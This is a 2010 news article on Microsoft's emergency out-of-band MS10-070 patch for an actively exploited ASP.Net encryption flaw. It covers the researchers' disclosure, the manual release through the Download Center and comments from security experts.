Microsoft issues emergency security patch for Windows
October 1, 2010
Wednesday, Microsoft delivered an ASP.Net emergency security fix for a Windows Server 2008 flaw that is being actively exploited by hackers all over the globe.
The security patch addresses a vulnerability in ASP.Net's encryption software that attackers could abuse to illegally gain access to Web applications with full administrator rights.
The security hole would also allow an attacker to decrypt session cookies or other encrypted data on a remote server, while also gain access and delete or copy files from websites or specific Web applications.
Overall, ASP.Net technology is a Microsoft-designed Internet application framework used to build and develop websites and applications.
Microsoft first discovered the security flaw September 17 after a two security researchers demonstrated how attackers could easily modify browser session cookies, or steal user names and passwords from websites.
Then 3 days later, Microsoft warned its users that it was seeing limited but active attacks, and urged Web server administrators to apply the workarounds spelled out in an updated security advisory.
Wednesday's MS10-070 update patches ASP.Net in all supported versions of Windows, ranging from Windows XP Service Pack 3 (SP3) and Windows Server 2003 to Windows 7 and Windows Server 2008 R2.
Microsoft dubbed the single security hole as important, the second-highest ranking in its four-step system.
"Based on our comprehensive monitoring of the security landscape, we have determined an out-of-band release is needed to protect Microsoft users, as we have seen limited attacks and continued attempts to bypass current defenses and workarounds," Microsoft said.
Microsoft took the unprecedented step of releasing the update only to its download center, where customers must retrieve the patch and install it manually. It won't push the patch to Windows Update until next "Patch Tuesday" which falls on Oct. 12.
"This is the first time we've released an update in this manner, but due to the nature of the active attacks and the severity of the potential loss of data, we are releasing the security update to the Microsoft Download Center first so customers -- specifically large enterprises, hosting providers and ISVs -- can begin updating their systems," Microsoft said.
Wolfgang Kandek, CTO of Qualys, a California-based security risk and compliance management provider, agreed that getting the security fix out this way was acceptable. End users, he said, are not typically vulnerable to attack since few run a Web server.
"They may have been looking at another week or so of testing," Kandek said, referring to the process Microsoft goes through to make sure that security patches deploy properly via Windows Update. "And with attacks happening, this lets them get it into the hands of administrators who need it now."
Overall, many security experts agreed that it was a smart move on Microsoft's part in being proactive.
"But I don't think it means anything is wrong," said Andrew Storms, director of security operations at nCircle Security. "The affected audience -- large companies, ISPs -- probably don't use Windows Update anyway. They likely have a much more stringent testing protocol."
It's possible that Juliano Rizzo and Thai Duong, the researchers who revealed the flaw Sept. 17 at an Argentinean security conference, had notified Microsoft prior to their presentation, said Kandek. If so, that would have given Microsoft more than the 11 days to fix the security hole.
Storms, however, thought otherwise. "Based on the fact that there is no name or names crediting the security vulnerability find in the advisory tells me that Microsoft didn't know about it prior to Sept. 17," he said.
Customers who apply Wednesday's security patch don't need to remove the workarounds they have applied at Microsoft's direction, a company spokesman said today. "Once you apply the security update, however, the workarounds are no longer required and can be removed," said Dave Forstrom, the director of communications with the Microsoft Security Response Center.
Wednesday's rush update, called an "out-of-band" patch reveals that it wasn't released in Microsoft's normal monthly schedule released on Sep. 28.
You can link to the Internet Security web site as much as you like.